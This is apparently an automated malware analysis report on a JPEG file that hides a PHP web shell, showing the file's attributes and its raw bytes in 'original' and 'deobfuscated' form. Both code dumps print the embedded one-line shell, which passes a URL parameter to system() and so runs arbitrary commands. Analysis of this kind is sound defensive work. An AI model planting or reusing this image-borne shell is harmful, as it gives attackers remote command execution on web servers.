PHP Malware Analysis
01_Bl4ckw0rMJPG.jpg
md5: fc09c94181157e1143ab9724f65f9bd2
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original)
Title
- 01_Bl4ckw0rMJPG.jpg (32×32) (HTML)
URLs
- http://localhost/01_Bl4ckw0rMJPG.jpg (HTML)
Deobfuscated PHP code
����JFIF���������;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 55
���C�
$, !$4.763.22:ASF:=N>22HbINVX]^]8EfmeZlS[]Y���C**Y;2;YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY���� � "���� ����������
�������}�!1AQa"q2���#B��R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������� �������
������w�!1AQaq"2�B���� #3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������
��?�-�i
�<|�<?php
system(
/**/
$_GET['c']
);
?>��R�s1�h|��<��#��<d
�Fx#��27��
e�$g ��϶9<r2�g�zO�����~�SK���yV�*F��#,]>eԍ�
�y
u�
t��i%����e�#$�9�$�q�bjH]�ff!�B�F�}�NFp1���A��<�QNs3"��S�/
��>��>�s�wȇw�o����^;��4RlhY����I8ۜ�x�w L�
8��)t*wl���#��x��sKn�P��D
���?(Nw�y�ש�>gYC��F����Tm��q�?N��Ss{-��|���q�}}5���Zd��sDu
��?t�DZ'�Ҭ�ȳ��J˵P)_�q���9<�*;��a�7[h,Zf��v��
�2�{��M����o�I��3�܁��ž�?
ܔ�O~��Execution traces
Generated HTML code
<html style="height: 100%;"><head><meta name="viewport" content="width=device-width, minimum-scale=0.1"><title>01_Bl4ckw0rMJPG.jpg (32×32)</title></head><body style="margin: 0px; background: #0e0e0e; height: 100%"><img style="display: block;-webkit-user-select: none;margin: auto;background-color: hsl(0, 0%, 90%);transition: background-color 300ms;" src="http://localhost/01_Bl4ckw0rMJPG.jpg"></body></html>Original PHP code
����JFIF���������;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 55
���C�
$, !$4.763.22:ASF:=N>22HbINVX]^]8EfmeZlS[]Y���C**Y;2;YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY���� � "���� ����������
�������}�!1AQa"q2���#B��R��$3br�
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������� �������
������w�!1AQaq"2�B���� #3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������
��?�-�i
�<|�<?php system(/**/$_GET['c'/**/]); ?>��R�s1�h|��<��#��<d
�Fx#��27��
e�$g ��϶9<r2�g�zO�����~�SK���yV�*F��#,]>eԍ�
�y
u�
t��i%����e�#$�9�$�q�bjH]�ff!�B�F�}�NFp1���A��<�QNs3"��S�/
��>��>�s�wȇw�o����^;��4RlhY����I8ۜ�x�w L�
8��)t*wl���#��x��sKn�P��D
���?(Nw�y�ש�>gYC��F����Tm��q�?N��Ss{-��|���q�}}5���Zd��sDu
��?t�DZ'�Ҭ�ȳ��J˵P)_�q���9<�*;��a�7[h,Zf��v��
�2�{��M����o�I��3�܁��ž�?
ܔ�O~��